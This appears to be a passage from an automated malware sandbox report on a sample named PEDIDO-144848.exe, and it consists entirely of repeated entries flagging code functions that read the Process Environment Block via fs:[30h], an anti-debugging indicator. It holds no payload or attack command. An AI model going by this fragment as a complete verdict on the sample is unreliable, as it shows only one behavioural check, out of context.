        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C33740 mov eax, dword ptr fs:[00000030h]2_2_36C33740
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3174A mov eax, dword ptr fs:[00000030h]2_2_36C3174A
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3A750 mov eax, dword ptr fs:[00000030h]2_2_36C3A750
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C22755 mov eax, dword ptr fs:[00000030h]2_2_36C22755
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C22755 mov eax, dword ptr fs:[00000030h]2_2_36C22755
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C22755 mov eax, dword ptr fs:[00000030h]2_2_36C22755
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C22755 mov ecx, dword ptr fs:[00000030h]2_2_36C22755
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C22755 mov eax, dword ptr fs:[00000030h]2_2_36C22755
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C22755 mov eax, dword ptr fs:[00000030h]2_2_36C22755
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CAE750 mov eax, dword ptr fs:[00000030h]2_2_36CAE750
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C12760 mov ecx, dword ptr fs:[00000030h]2_2_36C12760
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C41763 mov eax, dword ptr fs:[00000030h]2_2_36C41763
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C41763 mov eax, dword ptr fs:[00000030h]2_2_36C41763
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C41763 mov eax, dword ptr fs:[00000030h]2_2_36C41763
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C41763 mov eax, dword ptr fs:[00000030h]2_2_36C41763
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C41763 mov eax, dword ptr fs:[00000030h]2_2_36C41763
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C41763 mov eax, dword ptr fs:[00000030h]2_2_36C41763
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C30774 mov eax, dword ptr fs:[00000030h]2_2_36C30774
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C04779 mov eax, dword ptr fs:[00000030h]2_2_36C04779
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C04779 mov eax, dword ptr fs:[00000030h]2_2_36C04779
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFB705 mov eax, dword ptr fs:[00000030h]2_2_36BFB705
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFB705 mov eax, dword ptr fs:[00000030h]2_2_36BFB705
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFB705 mov eax, dword ptr fs:[00000030h]2_2_36BFB705
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFB705 mov eax, dword ptr fs:[00000030h]2_2_36BFB705
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0D700 mov ecx, dword ptr fs:[00000030h]2_2_36C0D700
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CC970B mov eax, dword ptr fs:[00000030h]2_2_36CC970B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CC970B mov eax, dword ptr fs:[00000030h]2_2_36CC970B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2270D mov eax, dword ptr fs:[00000030h]2_2_36C2270D
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2270D mov eax, dword ptr fs:[00000030h]2_2_36C2270D
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2270D mov eax, dword ptr fs:[00000030h]2_2_36C2270D
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0471B mov eax, dword ptr fs:[00000030h]2_2_36C0471B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0471B mov eax, dword ptr fs:[00000030h]2_2_36C0471B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CBF717 mov eax, dword ptr fs:[00000030h]2_2_36CBF717
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C29723 mov eax, dword ptr fs:[00000030h]2_2_36C29723
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFF75B mov eax, dword ptr fs:[00000030h]2_2_36BFF75B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFF75B mov eax, dword ptr fs:[00000030h]2_2_36BFF75B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFF75B mov eax, dword ptr fs:[00000030h]2_2_36BFF75B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFF75B mov eax, dword ptr fs:[00000030h]2_2_36BFF75B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFF75B mov eax, dword ptr fs:[00000030h]2_2_36BFF75B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFF75B mov eax, dword ptr fs:[00000030h]2_2_36BFF75B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFF75B mov eax, dword ptr fs:[00000030h]2_2_36BFF75B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFF75B mov eax, dword ptr fs:[00000030h]2_2_36BFF75B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFF75B mov eax, dword ptr fs:[00000030h]2_2_36BFF75B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C214C9 mov eax, dword ptr fs:[00000030h]2_2_36C214C9
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C214C9 mov eax, dword ptr fs:[00000030h]2_2_36C214C9
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C214C9 mov eax, dword ptr fs:[00000030h]2_2_36C214C9
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C214C9 mov eax, dword ptr fs:[00000030h]2_2_36C214C9
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C214C9 mov eax, dword ptr fs:[00000030h]2_2_36C214C9
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2F4D0 mov eax, dword ptr fs:[00000030h]2_2_36C2F4D0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2F4D0 mov eax, dword ptr fs:[00000030h]2_2_36C2F4D0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2F4D0 mov eax, dword ptr fs:[00000030h]2_2_36C2F4D0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2F4D0 mov eax, dword ptr fs:[00000030h]2_2_36C2F4D0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2F4D0 mov eax, dword ptr fs:[00000030h]2_2_36C2F4D0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2F4D0 mov eax, dword ptr fs:[00000030h]2_2_36C2F4D0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2F4D0 mov eax, dword ptr fs:[00000030h]2_2_36C2F4D0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2F4D0 mov eax, dword ptr fs:[00000030h]2_2_36C2F4D0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2F4D0 mov eax, dword ptr fs:[00000030h]2_2_36C2F4D0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C244D1 mov eax, dword ptr fs:[00000030h]2_2_36C244D1
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C244D1 mov eax, dword ptr fs:[00000030h]2_2_36C244D1
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C354E0 mov eax, dword ptr fs:[00000030h]2_2_36C354E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3E4EF mov eax, dword ptr fs:[00000030h]2_2_36C3E4EF
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3E4EF mov eax, dword ptr fs:[00000030h]2_2_36C3E4EF
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C064F0 mov eax, dword ptr fs:[00000030h]2_2_36C064F0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3A4F0 mov eax, dword ptr fs:[00000030h]2_2_36C3A4F0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3A4F0 mov eax, dword ptr fs:[00000030h]2_2_36C3A4F0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CBF4FD mov eax, dword ptr fs:[00000030h]2_2_36CBF4FD
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C294FA mov eax, dword ptr fs:[00000030h]2_2_36C294FA
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C00485 mov ecx, dword ptr fs:[00000030h]2_2_36C00485
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3648A mov eax, dword ptr fs:[00000030h]2_2_36C3648A
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3648A mov eax, dword ptr fs:[00000030h]2_2_36C3648A
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3648A mov eax, dword ptr fs:[00000030h]2_2_36C3648A
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3B490 mov eax, dword ptr fs:[00000030h]2_2_36C3B490
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3B490 mov eax, dword ptr fs:[00000030h]2_2_36C3B490
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C8C490 mov eax, dword ptr fs:[00000030h]2_2_36C8C490
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C024A2 mov eax, dword ptr fs:[00000030h]2_2_36C024A2
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C024A2 mov ecx, dword ptr fs:[00000030h]2_2_36C024A2
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C8D4A0 mov ecx, dword ptr fs:[00000030h]2_2_36C8D4A0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C8D4A0 mov eax, dword ptr fs:[00000030h]2_2_36C8D4A0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C8D4A0 mov eax, dword ptr fs:[00000030h]2_2_36C8D4A0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C344A8 mov eax, dword ptr fs:[00000030h]2_2_36C344A8
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3E4BC mov eax, dword ptr fs:[00000030h]2_2_36C3E4BC
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C10445 mov eax, dword ptr fs:[00000030h]2_2_36C10445
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C10445 mov eax, dword ptr fs:[00000030h]2_2_36C10445
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C10445 mov eax, dword ptr fs:[00000030h]2_2_36C10445
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C10445 mov eax, dword ptr fs:[00000030h]2_2_36C10445
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C10445 mov eax, dword ptr fs:[00000030h]2_2_36C10445
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C10445 mov eax, dword ptr fs:[00000030h]2_2_36C10445
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3D450 mov eax, dword ptr fs:[00000030h]2_2_36C3D450
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3D450 mov eax, dword ptr fs:[00000030h]2_2_36C3D450
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0D454 mov eax, dword ptr fs:[00000030h]2_2_36C0D454
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0D454 mov eax, dword ptr fs:[00000030h]2_2_36C0D454
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0D454 mov eax, dword ptr fs:[00000030h]2_2_36C0D454
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0D454 mov eax, dword ptr fs:[00000030h]2_2_36C0D454
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0D454 mov eax, dword ptr fs:[00000030h]2_2_36C0D454
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0D454 mov eax, dword ptr fs:[00000030h]2_2_36C0D454
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2E45E mov eax, dword ptr fs:[00000030h]2_2_36C2E45E
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2E45E mov eax, dword ptr fs:[00000030h]2_2_36C2E45E
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2E45E mov eax, dword ptr fs:[00000030h]2_2_36C2E45E
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2E45E mov eax, dword ptr fs:[00000030h]2_2_36C2E45E
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2E45E mov eax, dword ptr fs:[00000030h]2_2_36C2E45E
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFB420 mov eax, dword ptr fs:[00000030h]2_2_36BFB420
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CCA464 mov eax, dword ptr fs:[00000030h]2_2_36CCA464
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C08470 mov eax, dword ptr fs:[00000030h]2_2_36C08470
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C08470 mov eax, dword ptr fs:[00000030h]2_2_36C08470
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BF640D mov eax, dword ptr fs:[00000030h]2_2_36BF640D
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CBF478 mov eax, dword ptr fs:[00000030h]2_2_36CBF478
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CBF409 mov eax, dword ptr fs:[00000030h]2_2_36CBF409
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C96400 mov eax, dword ptr fs:[00000030h]2_2_36C96400
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C96400 mov eax, dword ptr fs:[00000030h]2_2_36C96400
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C89429 mov eax, dword ptr fs:[00000030h]2_2_36C89429
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C37425 mov eax, dword ptr fs:[00000030h]2_2_36C37425
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C37425 mov ecx, dword ptr fs:[00000030h]2_2_36C37425
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C8F42F mov eax, dword ptr fs:[00000030h]2_2_36C8F42F
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C8F42F mov eax, dword ptr fs:[00000030h]2_2_36C8F42F
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C8F42F mov eax, dword ptr fs:[00000030h]2_2_36C8F42F
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C8F42F mov eax, dword ptr fs:[00000030h]2_2_36C8F42F
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C8F42F mov eax, dword ptr fs:[00000030h]2_2_36C8F42F
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3C5C6 mov eax, dword ptr fs:[00000030h]2_2_36C3C5C6
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C805C6 mov eax, dword ptr fs:[00000030h]2_2_36C805C6
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C365D0 mov eax, dword ptr fs:[00000030h]2_2_36C365D0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0B5E0 mov eax, dword ptr fs:[00000030h]2_2_36C0B5E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0B5E0 mov eax, dword ptr fs:[00000030h]2_2_36C0B5E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0B5E0 mov eax, dword ptr fs:[00000030h]2_2_36C0B5E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0B5E0 mov eax, dword ptr fs:[00000030h]2_2_36C0B5E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0B5E0 mov eax, dword ptr fs:[00000030h]2_2_36C0B5E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0B5E0 mov eax, dword ptr fs:[00000030h]2_2_36C0B5E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3A5E7 mov ebx, dword ptr fs:[00000030h]2_2_36C3A5E7
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3A5E7 mov eax, dword ptr fs:[00000030h]2_2_36C3A5E7
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C315EF mov eax, dword ptr fs:[00000030h]2_2_36C315EF
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C8C5FC mov eax, dword ptr fs:[00000030h]2_2_36C8C5FC
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3A580 mov eax, dword ptr fs:[00000030h]2_2_36C3A580
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3A580 mov eax, dword ptr fs:[00000030h]2_2_36C3A580
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C39580 mov eax, dword ptr fs:[00000030h]2_2_36C39580
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C39580 mov eax, dword ptr fs:[00000030h]2_2_36C39580
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CBF582 mov eax, dword ptr fs:[00000030h]2_2_36CBF582
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C7E588 mov eax, dword ptr fs:[00000030h]2_2_36C7E588
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C7E588 mov eax, dword ptr fs:[00000030h]2_2_36C7E588
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C32594 mov eax, dword ptr fs:[00000030h]2_2_36C32594
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C8C592 mov eax, dword ptr fs:[00000030h]2_2_36C8C592
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C885AA mov eax, dword ptr fs:[00000030h]2_2_36C885AA
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C045B0 mov eax, dword ptr fs:[00000030h]2_2_36C045B0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C045B0 mov eax, dword ptr fs:[00000030h]2_2_36C045B0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFF5C7 mov eax, dword ptr fs:[00000030h]2_2_36BFF5C7
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFF5C7 mov eax, dword ptr fs:[00000030h]2_2_36BFF5C7
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFF5C7 mov eax, dword ptr fs:[00000030h]2_2_36BFF5C7
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFF5C7 mov eax, dword ptr fs:[00000030h]2_2_36BFF5C7
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFF5C7 mov eax, dword ptr fs:[00000030h]2_2_36BFF5C7
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFF5C7 mov eax, dword ptr fs:[00000030h]2_2_36BFF5C7
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFF5C7 mov eax, dword ptr fs:[00000030h]2_2_36BFF5C7
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFF5C7 mov eax, dword ptr fs:[00000030h]2_2_36BFF5C7
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFF5C7 mov eax, dword ptr fs:[00000030h]2_2_36BFF5C7
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BF753F mov eax, dword ptr fs:[00000030h]2_2_36BF753F
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BF753F mov eax, dword ptr fs:[00000030h]2_2_36BF753F
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BF753F mov eax, dword ptr fs:[00000030h]2_2_36BF753F
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C36540 mov eax, dword ptr fs:[00000030h]2_2_36C36540
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C38540 mov eax, dword ptr fs:[00000030h]2_2_36C38540
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1E547 mov eax, dword ptr fs:[00000030h]2_2_36C1E547
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0754C mov eax, dword ptr fs:[00000030h]2_2_36C0754C
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0254C mov eax, dword ptr fs:[00000030h]2_2_36C0254C
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CDB55F mov eax, dword ptr fs:[00000030h]2_2_36CDB55F
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CDB55F mov eax, dword ptr fs:[00000030h]2_2_36CDB55F
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CCA553 mov eax, dword ptr fs:[00000030h]2_2_36CCA553
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1C560 mov eax, dword ptr fs:[00000030h]2_2_36C1C560
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFB502 mov eax, dword ptr fs:[00000030h]2_2_36BFB502
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C02500 mov eax, dword ptr fs:[00000030h]2_2_36C02500
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2E507 mov eax, dword ptr fs:[00000030h]2_2_36C2E507
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2E507 mov eax, dword ptr fs:[00000030h]2_2_36C2E507
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2E507 mov eax, dword ptr fs:[00000030h]2_2_36C2E507
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2E507 mov eax, dword ptr fs:[00000030h]2_2_36C2E507
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2E507 mov eax, dword ptr fs:[00000030h]2_2_36C2E507
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2E507 mov eax, dword ptr fs:[00000030h]2_2_36C2E507
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2E507 mov eax, dword ptr fs:[00000030h]2_2_36C2E507
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2E507 mov eax, dword ptr fs:[00000030h]2_2_36C2E507
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3C50D mov eax, dword ptr fs:[00000030h]2_2_36C3C50D
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3C50D mov eax, dword ptr fs:[00000030h]2_2_36C3C50D
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CAF51B mov eax, dword ptr fs:[00000030h]2_2_36CAF51B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CAF51B mov eax, dword ptr fs:[00000030h]2_2_36CAF51B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CAF51B mov eax, dword ptr fs:[00000030h]2_2_36CAF51B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CAF51B mov eax, dword ptr fs:[00000030h]2_2_36CAF51B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CAF51B mov eax, dword ptr fs:[00000030h]2_2_36CAF51B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CAF51B mov eax, dword ptr fs:[00000030h]2_2_36CAF51B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CAF51B mov ecx, dword ptr fs:[00000030h]2_2_36CAF51B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CAF51B mov ecx, dword ptr fs:[00000030h]2_2_36CAF51B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CAF51B mov eax, dword ptr fs:[00000030h]2_2_36CAF51B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CAF51B mov eax, dword ptr fs:[00000030h]2_2_36CAF51B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CAF51B mov eax, dword ptr fs:[00000030h]2_2_36CAF51B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CAF51B mov eax, dword ptr fs:[00000030h]2_2_36CAF51B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CAF51B mov eax, dword ptr fs:[00000030h]2_2_36CAF51B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C8C51D mov eax, dword ptr fs:[00000030h]2_2_36C8C51D
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C21514 mov eax, dword ptr fs:[00000030h]2_2_36C21514
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C21514 mov eax, dword ptr fs:[00000030h]2_2_36C21514
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C21514 mov eax, dword ptr fs:[00000030h]2_2_36C21514
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C21514 mov eax, dword ptr fs:[00000030h]2_2_36C21514
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C21514 mov eax, dword ptr fs:[00000030h]2_2_36C21514
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C21514 mov eax, dword ptr fs:[00000030h]2_2_36C21514
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3F523 mov eax, dword ptr fs:[00000030h]2_2_36C3F523
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C31527 mov eax, dword ptr fs:[00000030h]2_2_36C31527
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1252B mov eax, dword ptr fs:[00000030h]2_2_36C1252B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1252B mov eax, dword ptr fs:[00000030h]2_2_36C1252B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1252B mov eax, dword ptr fs:[00000030h]2_2_36C1252B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1252B mov eax, dword ptr fs:[00000030h]2_2_36C1252B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1252B mov eax, dword ptr fs:[00000030h]2_2_36C1252B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1252B mov eax, dword ptr fs:[00000030h]2_2_36C1252B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1252B mov eax, dword ptr fs:[00000030h]2_2_36C1252B
